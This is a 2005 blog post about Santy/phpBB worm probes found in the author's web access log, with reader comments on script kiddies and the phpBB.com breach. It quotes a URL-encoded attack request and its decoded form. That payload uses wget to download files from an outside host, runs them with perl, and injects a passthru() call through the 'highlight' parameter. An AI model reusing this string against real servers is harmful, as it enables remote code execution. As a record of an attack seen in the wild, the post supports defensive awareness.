PhpBB security attacks

Referencing: F-Secure Virus Descriptions : Santy

I happened to notice a series of strange entries in my web access log:



130.230.88.16 - - [05/Jan/2005:22:42:27 +0000] "GET
> /dbsuggest.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F
&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56
%41%52%53%5B%72%75%73%68%5D%29.%2527';
> HTTP/1.1" 404 3173 "-" "LWP::Simple/5.79"
 

There were a LOT of these. I couldn't imagine what the heck this was, but figured it must be some kind of attack, so I asked my son-in-law, the web expert. He didn't recognize it at first either, but shortly came back with the web page referenced above, which explains that this is trying to exploit PhpBB problems.

This is what it looks like decoded (again, from my son-in-law, thanks Niall):

rush=echo _START_; cd /tmp;wget
atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget
atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl
sess_189f0f0889555397a4de5485dd611112;rm
sess_189f0f0889555397a4de5485dd611112;perl
sess_189f0f0889555397a4de5485dd611111;rm
sess_189f0f0889555397a4de5485dd611111; echo
_END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27\';
 

I don't use PhpBB, so have no idea why these folks bother. More script kiddies, I guess..



Got something to add? Send me email.





(OLDER) <- More Stuff -> (NEWER)    (NEWEST)   

Printer Friendly Version

-> -> PhpBB security attacks




Increase ad revenue 50-250% with Ezoic


More Articles by

Find me on Google+

© Tony Lawrence




Do you think you were being attacked on purpose, or by mistake, since I heard that the trojan was using google to search for people that were running phpBB.

If script kiddies are really that bad, by not even checking to see if you are running the software they are trying to exploit, then they are dumber than I give them credit for.

Actually, years ago, I caught a script kiddie in progress trying to run some FreeBSD wu-ftpd exploits on my linux system :-)

They will never learn!

--BruceGarlock


---January 7, 2005

most of those type are just actually kids. They swap some *redacted* or email a link to a pirated photoshopr program or whatnot on a irc channel and then in return some guy e-mail them a script.

Most of them can't even tell what they do or even how to edit or read bash or perl scripts. So lots of the time they have little clue even to the purpose the script they are using does.

It's like "dude, this guy e-mailed me this and it can hack forums" is about as deep as it gets sometimes.

Of course they get older and learn a bit. Some learn how to program and begin farting out viruses for their friends to get 1337 status. Then by the time they are 15-16 years old they would have entire ISP's backbones under their control thru the wormy Windows machines, or they hack some hapless ftp server for some small business and get a couple T1's under their control.

Of course since they have no real life they do things like have juvenile-level relationships online, cybersex and that sort of thing. Then when one "cheats" or gets in some flamewar they'll take out, or at least degrade, service to whole sections of the internet as they run DOS attacks on each other.

Now they have figured how to make money off it thru the whole renting and selling of botnets to spammers.

Of course these are just kids, imagine what a experianced black hat programmer can do with 10-20 years or experiance in doing crap like this. He bangs out some scripts, writes a couple exploits and gives them out to his "minions". I wouldn't be suprised if some of the worms and virus outbreaks are nothing more then cover for professional attacks on specific targets.

--Drag



---January 10, 2005


I think their lingo annoys me the most. Things like d00d, and 1337. I must be getting older, since I do not understand the lingo as much anymore. Maybe when my daughter comes of age, I will get more interested again, but that is another 10 years away at least. Many things will have changed by then. Heck, 10 years ago, a 386 was fast.

I think we can all agree that these clowns will never go away. Kids will always be mischevious, and I did my share of things that were bad when I was young. When it comes to computers, though, you may be messing with someones life, which is where things get complicated. Spraying someones house with shaving cream at halloween, is a little less damaging, than taking down a server that is used by city governments to transmit important medical, police, and fire dispatch.

I always thought that instead of putting these clowns away, and sucking up my tax dollars, that they should be heavily supervised, and perform free coding work for the businesses they damaged with their code. Sure, it would take another person job to supervise them, but possibly the criminal, *could* be rehabilitated, and see what good can come of their computer knowledge, and possibly spark a light in their heart. Chances are, they have never been treated well as kids, because of their "geek" status. Luckily, although I was good at computers in High School, and would often get called out of classes over the loudspeaker during the day, to go fix the server, I still played sports, and attended most social events, if I wasn't throwing the "social event" myself. I just chose not to make computers the focus of my life, and shut everything else out. There was no Internet for me growing up, so it's hard to say how the Internet would have affected me, being so interested in computers. I did run my own BBS, and frequented several other BBS's, but that was nothing like things are today.

Many of these script kiddies have few friends, and are made fun of, so they lash out by trying to deystroy, which probably makes them feel better about being picked on. As we here that bullying in the high schools continues to get worse, and kids get picked on more and more, these people will continue to grow from these environments. Look at the Columbine incident. Another case, where the students where perceived by their peers as outsiders, and they could no longer take it. Very sad.

We need to attack this problem, from a parenting standpoint, and not allow this kind of behavior to be tolerated in schools. If it is not controlled, someone, somewhere is going to snap again, and more loss of life could be possible. The schools should have more people to identify possible targets of bulleys, so they can be counciled. Of course this cost money, and people do not care to pay taxes as it is, so maybe the problem will never be solved, and we can spend even more when the results of not fixing the root of the problem, verus the end result will be seen.

This of course, opens up a whole new discussion, and political debate, on how to solve some of the problems that affect our young kids, and how the problems should be dealt with. I am all for fixing the cause of the problem, rather than reacting to the outcome the problem will bring, since it could be yours or my life unintentionally on the line.

--BruceGarlock

---January 23, 2005

I see WHY these morons are doing this: there's an article that has a LINK in it to a site that uses phpBB !!

Gaad! Pathetic.. I suppose it will be months and months of this before they move on..

--TonyLawrence


---February 9, 2005

Things have gotten a bit worse for the phpBB community. Apparantly crackers found a way to get into the main phpBB site, and lock the developers out! The phpBB admins claim the crack was in a third party program, awstats, and not phpBB that was vulnerable. Such a shame. Here is the text on the main phpBB site, as of today, 2/11/05:



"Last updated: 9th February 2005, 12:22 GMT

Hi everyone,

A further update and reminder as to the situation with this site. Our system was compromised Sunday evening by a group of hackers/crackers who (based on available information apparently corroborated by said hackers/crackers) used an exploit in awstats to gain entry. I'll repeat this very clearly since some people and worse some hosting providers are not listening to what is being said. Based on said information we do not believe, nor do we have any reason to believe, that our system was compromised due to any fault in phpBB 2.0.11.

Server update, unfortunately the datacenter where our box is located have been less than helpful. The box was supposed to have been shipped Monday, it wasn't. With further pushing we were told it would definitely ship yesterday (Tuesday), it didn't. The box is now being collected "manually". Very unimpressive service quite frankly. Because of this we are now working to an altered plan which may see the site return tomorrow (Thursday 9th) or Friday (10th). Please note that we will not be able to comment on the method used to exploit our site for at least several days.

It is actually quite fustrating at present that some hosting providers are asking or forcing their customers to remove installs of phpBB 2.0.11 due to the loss of phpbb.com. As I say above, our best available information right now is that phpBB was not to blame. If a hosting provider knows different perhaps they can inform us (along with details of how they know!).

Equally it's annoying to see some people posting the same old highlighting exploit claiming their 2.0.11 board was hacked via it. Again unless my team and indeed our other teams, heck large sections of our community, are all lying to me that vulnerability was fixed in 2.0.11. Sites running .11 and claiming (or thier hosts claiming) to have been attacked using it should take a close look at other applications they have installed. phpBB is not alone in being exploited, all the major boards can be if you don't update as new releases are made. Equally users should ensure the relevant highlighting fix is indeed present. Over the years we've dealt with thousands of users who say they've patched something (be it an exploit or bug) but upon examination we've discovered the problem code is still there. Equally hosts should look at their own systems. Are you running awstats if so have you updated? Do you regularly update your OS and particularly the kernel (if appropriate) as fixes are released? Are your users running old versions of other PHP/Perl/etc. software? Have you set appropriate permissions on key folders such as /tmp and /var/tmp? Is your webserver running with as few permissions as possible? Just because we overlooked something doesn't mean you should!

To our community, please do not ask us for further updates as to the situation, its cause, etc. Everything we have to say is said here. Our support channel (#phpbb) on IRC has at times been swamped with "What happened? Any news?" style questions which are making it extremely difficult to support users with real issues. So we appreciate the interest but please, accept that we have nothing else to add.

Users in need of support with phpBB 2.0.x can visit our development board, area51.phpbb.com where such support is being offered at this time. Of course you can also view the next version of phpBB, 3.0 "Olympus" in the process (minus the new style of course!). We are also maintaining our IRC support channel, #phpbb on the irc.freenode.net network

Again we apologise for any problems this may cause our userbase. We obviously take the huge support our community gives phpBB very seriously. And we will do our best to return to "normal operations" just as soon as we can.

psoTFX - phpBB Group"


I hope they find the crackers that have done this. What are they trying to proove? Someone offers a free Bulletin Board, which are often used to share ideas with people, and this is how they are paid back? Where is the respect?

--BruceGarlock



Kerio Connect Mailserver

Kerio Samepage

Kerio Control Firewall

Have you tried Searching this site?

Unix/Linux/Mac OS X support by phone, email or on-site: Support Rates

This is a Unix/Linux resource website. It contains technical articles about Unix, Linux and general computing related subjects, opinion, news, help files, how-to's, tutorials and more.

Contact us





UNIX is simple. It just takes a genius to understand its simplicity. (Dennis Ritchie)

If you ask "Should we be in space?" you ask a nonsense question. We are in space. We will be in space. (Frank Herbert)







This post tagged: